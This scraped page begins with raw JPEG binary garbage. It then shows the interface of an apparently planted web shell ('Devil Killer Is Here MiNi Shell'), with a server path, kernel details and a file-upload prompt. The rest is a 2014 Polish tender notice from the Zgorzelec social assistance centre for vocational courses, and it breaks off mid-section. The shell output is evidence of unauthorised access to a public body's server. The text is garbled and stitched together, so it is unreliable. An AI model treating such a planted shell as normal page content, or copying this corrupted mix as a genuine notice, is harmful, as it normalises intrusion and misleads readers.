JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140328/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140328/107066-N-2014.html

<p class="kh_header"><b>Zgorzelec: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów i szkoleń zawodowych dla 27 uczestników w ramach projektu systemowego Nowa Szansa w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej; Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej</b><br>
<b>Numer ogłoszenia: 107066 - 2014; data zamieszczenia: 28.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomicy Społecznej , Tadeusza Kościuszki 70, 59-900 Zgorzelec, woj. dolnośląskie, tel. 75 7752667, faks 75 7752667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopszgorzelec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów i szkoleń zawodowych dla 27 uczestników w ramach projektu systemowego Nowa Szansa w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej; Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów i szkoleń zawodowych w podziale na części:
CZĘŚĆ I  - Kurs prawa jazdy kat. B,
CZĘŚĆ II - Kurs prawa jazdy kat. C z kwalifikacją wstępną przyspieszoną,
CZĘŚĆ III - Kurs opiekunka do dzieci i osób starszych z podstawami jęz. niemieckiego,
CZĘŚĆ IV - Kurs na operatora koparko-ładowarki,
CZĘŚĆ V - Szkolenie bukieciarz -florysta z artystycznym pakowaniem prezentów,
CZĘŚĆ VI - Terapia psychologiczna,
CZĘŚĆ VII - Poradnictwo indywidualne i grupowe w zakresie kompetencji życiowych i umiejętności społeczno-zawodowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 85.31.23.20-8, 85.12.12.70-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy w oparciu o Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października  2004 r. w sprawie rejestru instytucji szkoleniowych (Dz. U. z 2004 r. Nr 236 poz. 2365), natomiast w przypadku ośrodków szkolenia kierowców wpis do rejestru przedsiębiorców prowadzących ośrodki szkolenia kierowców w rozumieniu przepisów art. 103 ust. 4 ustawy Prawo o ruchu drogowym (Dz. U.  z 2005 r. Nr 108, poz. 908 z późniejszymi zmianami) - wydany przez starostę powiatu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedstawi wykaz wyposażenia zakładu i urządzeń dostępnych Wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaże osoby, uczestniczące w wykonywaniu zamówienia z informacją o ich kwalifikacjach i doświadczeniu niezbędnym do wykonania zamówienia , zakresu wykonywania przez nich czynności i informacji o podstawie do dysponowania tymi osobami, oraz złoży oświadczenie, że osoby, które będą uczestniczyły w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz ofertowy - załącznik nr 1 do SIWZ.
2. Formularz cenowy (załącznik nr 2 do SIWZ).
3. Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3).
4. Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych (załącznik nr 5).
5. Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia (załącznik nr 6 do SIWZ).
6. Wykaz miejsc prowadzenia zajęć praktycznych i teoretycznych (załącznik nr 7 do SIWZ).
7. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
8. Wykonawcy występujący wspólnie muszą, zgodnie z zapisami art. 23 ust. 2 ustawy PZP, ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarciu umowy o udzielenie przedmiotowego zamówienia publicznego. Do oferty należy dołączyć pełnomocnictwo, które powinno dokładnie określać zakres umocowania. 
9. Oświadczenie o braku podstaw do wykluczenia z postępowania oraz informacja dot. grupy kapitałowej wg wzoru określonego w załączniku nr 4 do SIWZ. 
10. W przypadku gdy wykonawca zamierza polegać na wiedzy i doświadczeniu, potencjale technicznym oraz osobach zdolnych do wykonania zamówienia innych podmiotów lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest dołączyć do oferty pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie możliwość dokonania zmiany umowy wyłącznie na warunkach określonych we wzorze umowy, stanowiącym załącznik nr 8 do SIWZ,
W tym:
a). zmiany danych Wykonawcy lub Zamawiającego bez zmiany samych stron umowy
(zmiana siedziby, adresu, nazwy, numeru rachunku bankowego, osób reprezentujących strony umowy) w przypadku zaistnienia wymienionych wyżej zmian po danej stronie umowy, 
b). zmiany przedstawicieli reprezentujących Zamawiającego lub Wykonawcę podczas
realizacji umowy w przypadkach: śmierci, choroby lub innych zdarzeń losowych wymienionych wyżej osób, jeżeli zmiana wymienionych wyżej osób okaże się konieczna z jakichkolwiek innych przyczyn niezależnych od stron,
c). terminu realizacji zamówienia, który może ulec zmianie w przypadku wystąpienia okoliczności niezależnych od Stron umowy z powodu których wykonanie umowy nie będzie możliwe w ustalonym terminie,
d). okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dostosowana do zaistniałych okoliczności,
e). nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym
wpływ na realizację przedmiotu zamówienia,
f). konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami
nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie,
g). konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji
Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości,
h). wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny
sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony,
i). zmiany określone w opisie przedmiotu zamówieni a dot. zwiększenia ilości osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://gopszgorzelec.pl/bip/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, ul. Kościuszki 70, 59-900 Zgorzelec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2014 godzina 14:00, miejsce: Gminny Ośrodek Pomocy Społecznej, ul. Kościuszki 70, 59-900 Zgorzelec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zmówienia będzie współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs prawa jazdy kategorii B (zajęcia teoretyczne i praktyczne). Ilość osób - 7.     Kurs powinien trwać:
- szkolenie teoretyczne w wymiarze 30 h lekcyjnych (1 godzina lekcyjna = 45 minut zegarowych/grupę). Zajęcia szkoleniowe powinny być planowane 5 razy w tygodniu od poniedziałku do piątku, a za zgodą osób skierowanych na kurs, także w dni ustawowo wolne od pracy tj. soboty, niedziele. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych.
-szkolenie praktyczne w wymiarze 30 h zegarowych na uczestnika kursu. Instytucja szkoląca zrealizuje według indywidualnych harmonogramów ustalonych wspólnie
z Zamawiającym dla każdego uczestnika kursu.
Przy realizacji szkolenia obejmującego kurs prawa jazdy kategorii B należy dodatkowo: zapewnić badania lekarskie o braku przeciwwskazań                           do uczestniczenia w kursie prawa jazdy kategorii B, zapewnić dla każdego uczestnika szkolenia samodzielne stanowisko szkoleniowe 
w postaci sprawnego, dopuszczonego do ruchu drogowego, dostosowanego do nauki jazdy samochodu oraz materiały dydaktyczne i szkoleniowe                                                              (m.in. podręcznik kierowcy, testy z pytaniami egzaminacyjnymi, płytę CD z komputerową bazą danych pytań, materiały firmowe, itp.), przeprowadzić egzamin wewnętrzny z zajęć teoretycznych i praktycznych, jednorazowo opłacić pierwszy egzamin państwowy (teoretyczny i praktyczny) na prawo jazdy kat. B dla każdego uczestnika szkolenia.
Realizacja części I zamówienia obejmuje przeprowadzenie kursu, najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym                     będą odbywać się zajęcia teoretyczne oraz ewentualny transport               uczestników kursu ze Zgorzelca do miejsca odbywania kursu i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników kursu NNW, zapewnienie uczestnikom niezbędnych narzędzi i materiałów szkoleniowych, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia teoretyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs prawa jazdy kat. C  z kwalifikacją wstępną przyspieszoną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs prawa jazdy kat. C z kwalifikacją wstępną przyspieszoną (zajęcia teoretyczne i praktyczne). Ilość osób - 2.   
Kurs powinien trwać:
- szkolenie teoretyczne w wymiarze 20 h lekcyjnych (1 godzina lekcyjna = 45 minut zegarowych na grupę). Zajęcia szkoleniowe powinny być planowane 5 razy w tygodniu od poniedziałku do piątku, a za zgodą osób skierowanych na szkolenie, także w dni ustawowo wolne od pracy tj. soboty, niedziele. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych.
-szkolenie praktyczne w wymiarze 30 h zegarowych na uczestnika szkolenia. Instytucja szkoląca zrealizuje według indywidualnych harmonogramów ustalonych wspólnie z Zamawiającym dla każdego uczestnika kursu. Dodatkowo przeprowadzony powinien być kurs kwalifikacji wstępnej przyspieszonej (140 godzin, z czego 130 godzin zajęć teoretycznych i 10 godzin jazdy, w tym 8 godzin jazdy samochodem i 2 godzin w warunkach specjalnych).
Przy realizacji szkolenia obejmującego kurs prawa jazdy kategorii C z kwalifikacją wstępną przyspieszoną należy dodatkowo: zapewnić badania lekarskie o braku przeciwwskazań do uczestniczenia w kursie prawa jazdy kategorii C z kwalifikacją wstępną przyspieszoną, zapewnić dla każdego uczestnika szkolenia samodzielne stanowisko szkoleniowe w postaci sprawnego, dopuszczonego do ruchu drogowego, dostosowanego do nauki jazdy samochodu oraz materiały dydaktyczne i szkoleniowe                                                              (m.in. podręcznik kierowcy, testy z pytaniami egzaminacyjnymi, płytę CD z komputerową bazą danych pytań, materiały firmowe, itp.), przeprowadzić egzamin wewnętrzny z zajęć teoretycznych i praktycznych, jednorazowo opłacić pierwszy egzamin państwowy (teoretyczny i praktyczny) na prawo jazdy kat. C z kwalifikacją wstępną przyśpieszoną dla każdego uczestnika kursu. Realizacja części II zamówienia obejmuje przeprowadzenie kursu, najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym będą odbywać się zajęcia teoretyczne i praktyczne oraz ewentualny transport uczestników kursu ze Zgorzelca do miejsca odbywania kursu i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników kursu NNW, zapewnienie uczestnikom niezbędnych narzędzi, materiałów szkoleniowych i artykułów w ilościach niezbędnych do nabycia przez uczestników kursu praktycznych umiejętności z zakresu tematyki ujętej w programie kursu, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne:                               woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia teoretyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs opiekunka do dzieci i osób starszych z podstawami języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs opiekunka do dzieci i osób starszych z podstawami języka niemieckiego(zajęcia teoretyczne i praktyczne). Ilość osób - 12. Kurs powinien trwać: 
- szkolenie teoretyczne 100 godzin lekcyjnych ( 1 godzina lekcyjna = 45 minut zegarowych na grupę), z czego 40 godzin języka niemieckiego, a 60 godzin zgodnie z programem szkolenia. Program szkolenia powinien uwzględniać m. in. następujące zagadnienia: podstawy psychologii, pedagogiki i etyki, wykonywanie czynności higienicznych przy podopiecznych, dietetyka i żywienie, organizacja czasu podopiecznych. Wymaga się, aby zajęcia były prowadzone w formie wykładów i ćwiczeń z wykorzystaniem odpowiedniego sprzętu dostępnego przez cały okres trwania szkolenia np. sprzęt do pomiaru ciśnienia oraz cukru.
- szkolenie praktyczne 80 godzin zegarowych na uczestnika kursu.
Zajęcia szkoleniowe powinny być planowane 5 razy w tygodniu od poniedziałku do piątku, a za zgodą osób skierowanych na kurs, także w dni ustawowo wolne od pracy tj. soboty, niedziele. Zaleca się, by wymiar dzienny każdego ze szkoleń wynosił max. 6 godzin lekcyjnych.
Realizacja części III zamówienia obejmuje przeprowadzenie kursu, najem lokalu na terenie miasta Zgorzelec lub gminy wiejskiej Zgorzelec, w którym będą odbywać  się zajęcia teoretyczne i praktyczne oraz ewentualny transport uczestników kursu ze Zgorzelca do miejsca odbywania szkolenia i z powrotem na terenie gminy wiejskiej Zgorzelec, ubezpieczenie uczestników NNW, zapewnienie uczestnikom niezbędnych narzędzi, materiałów szkoleniowych, odzieży ochronnej w ilościach niezbędnych do nabycia przez uczestników szkolenia praktycznych umiejętności z zakresu tematyki ujętej w programie kursu, zapewnienie na każde spotkanie poczęstunku (np. bułki słodkie lub suche ciasteczka; napoje zimne: woda mineralna; napoje ciepłe: kawa, herbata; cukier; kubki; talerzyki i łyżeczki jednorazowe) do lokalu, w którym będą odbywać się zajęcia teoretyczne.
Każdy z uczestników kursu otrzyma zaświadczenie o ukończeniu kursu zgodnie ze wzorem ustalonym przez Ministra Edukacji Narodowej. Dodatkowo kursanci otrzymają certyfikat w języku: angielskim i niemieckim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs na operatora koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs na operatora koparko-ładowarki (zajęcia teoretyczne i praktyczne). Ilość osób - 4. Kurs powinien trwać: 
- szkolenie teoretyczne 120 godzin lekcyjnych (1 godzina lekcyjna = 45 minut zegarowych na grupę),
- szkolenie praktyczne 60 godzin zegarowych na uczestnika szkolenia. 
